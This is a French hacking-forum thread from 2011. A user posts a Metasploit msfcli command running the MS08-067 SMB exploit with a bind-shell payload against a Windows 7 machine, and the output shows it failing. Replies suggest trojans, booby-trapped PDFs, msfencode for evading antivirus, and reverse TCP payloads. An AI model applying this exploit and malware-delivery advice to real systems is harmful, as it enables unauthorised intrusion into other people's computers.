Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-11-2011 17:29:30

deto
Membre
Inscription : 15-10-2011
Messages : 11

utilisation metasploit

salut,


  Après avoir cracké mon wifi, je souhaiterai m'introduire dans un pc. je vous explique la configuration :
       1 pc sous backtrack (instalation en dur) relié à la box par cable eternet .
       1 pc sous w7 connecté à la bax en wifi.

J'aimerai ouvrir une console sur backtrack qui  controle le w7.

Je me suis renseigné , en cherchant des tutos etc etc...
 
et donc voici ma demarche :

msf > msfcli windows/smb/ms08_067_netapi RHOST=192.168.x.x P
        [*] exec: msfcli windows/smb/ms08_067_netapi RHOST=192.168.x.x P

[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                                    Description
   ----                                         -----------
   generic/custom                          Use custom string or file as payload. Set either PAYLOADFILE or
                                                    PAYLOADSTR.
   generic/debug_trap                    Generate a debug trap in the target process
   generic/shell_bind_tcp                Listen for a connection and spawn a command 
    etc etc...                                   shell

J'ai donc trouvé le payload qui correspond à ce que je veux faire :

 

msf > msfcli windows/smb/ms08_067_netapi RHOST=192.168.x.x PAYLOAD=windows/shell_bind_tcp E
[*] exec: msfcli windows/smb/ms08_067_netapi RHOST=192.168.x.x PAYLOAD=windows/shell_bind_tcp E

[*] Please wait while we load the module tree...

# cowsay++                                                                                                                         
 ____________                                                                                                                      
< metasploit >                                                                                                                     
 ------------                                                                                                                      
       \   ,__,                                                                                                                    
        \  (oo)____                                                                                                                
           (__)    )\                                                                                                              
              ||--|| *                                                                                                             
                                                                                                                                   

       =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13462 updated 107 days ago (2011.08.01)


RHOST => 192.168.x.x
PAYLOAD => windows/shell_bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Home Premium - (Build 7601) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target
[*] Exploit completed, but no session was created.

Et ca ne fonctionne pas sad .
  Y'a t'il une erreur flagrante ou quelque chose que je devrais savoir et que j'ai raté lors de ma documentation
  (qui c'est principalement effectué ici)

ps : je tien à preciser que je suis propriétaire du réseaux et des 2 pc.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-11-2011 19:23:46

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : utilisation metasploit

Sujet déplacé, le payload "windows/smb/ms08_067_netapi RHOST=192.168.x.x PAYLOAD=windows/shell_bind_tcp E" est dépassé depuis un moment, surtout que le pc cible et un win7... si tu veux utiliser metasploit je pense que tu devrais t'orienter vers l'envoi de fichier malicieux (genre trojan ou PDF piégé wink )

Hors Ligne

#3 16-11-2011 20:36:02

deto
Membre
Inscription : 15-10-2011
Messages : 11

Re : utilisation metasploit

a ok merci, ben en fait c'est pas que je veux utiliser metasploit, c'est que je veux prendre le contrôle du pc à distance (en étant sur le même réseaux local).
  Dans ce cas que faut-il utiliser ?
 
Parce que les trojans ou autre.exe, c'est sympa, mais il faut que l'utilisateur l'ouvre.
Et donc il faut bypasser l'antivirus etc etc, disons que c'est un exercice que je me réserve pour plus tard  smile.

En fait 'aimerai savoir si on peut prendre le controle du pc sans aucune interaction directe ou indirecte avec l'utilisateur. Et comment faire.

Hors Ligne

#4 16-11-2011 21:15:09

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : utilisation metasploit

En fait 'aimerai savoir si on peut prendre le controle du pc sans aucune interaction directe ou indirecte avec l'utilisateur. Et comment faire.

Perso quand j'ai commencé a utiliser metasploit j'utilisais msfencode, le tout est d'arriver a ouvrir une session sur le PC cible pour ça le meilleur moyen est d'envoyer un fichier exe sur le pc cible msfencode peut t'aider a ça wink désactiver ton antivirus pour le début de tes tests après une fois la session ouverte c'est que du fun smile

Ps: j'oubliais un détail important, tu peux utiliser le reverse tcp pour tenter d'ouvrir une session et faire en sorte que l'utilisateur se connecte a toi plus d'infos sur metasploit unleashed

Hors Ligne

#5 16-11-2011 21:20:48

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : utilisation metasploit

Plus de détails ici --> Msfpayload

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]